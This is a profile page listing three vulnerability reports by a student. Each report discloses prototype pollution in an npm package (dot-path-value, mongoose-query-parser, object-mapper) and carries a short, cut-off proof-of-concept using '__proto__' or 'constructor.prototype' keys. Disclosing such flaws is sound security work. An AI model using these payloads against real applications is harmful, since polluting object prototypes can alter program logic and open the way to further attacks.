Dezhen Kong

icon indicating a website link https://libc.io

icon company ZJU icon location Hangzhou icon location A student at Zhejiang University

Results 3 issues of Dezhen Kong

Prototype Pollution of setByPath

I have found a prototype pollution vulnerability, below is the PoC: ``` var path = require('dot-path-value'); assert(({}).polluted === undefined); path.setByPath({}, '__proto__.polluted', 'yes'); // or path.setByPath({}, 'constructor.prototype.polluted', 'yes') assert(({}).polluted === 'yes');...

Potential Prototype pollution

I have found a potential prototype pollution in the project in `castFilter` function. Here is an example exploit: ``` const {MongooseQueryParser} = require('mongoose-query-parser'); let parser = new MongooseQueryParser(); parser.parse('__proto__!%3Dpolluted=', {});...

A Potential Prototype Pollution

I have found a potential prototype pollution of the function setKeyValue. Here is a PoC exploit: ``` var objectMapper = require('object-mapper'); assert(({}).polluted === undefined); objectMapper.setKeyValue({}, '__proto__.polluted', 'yes',{}); assert(({}).polluted === 'yes');...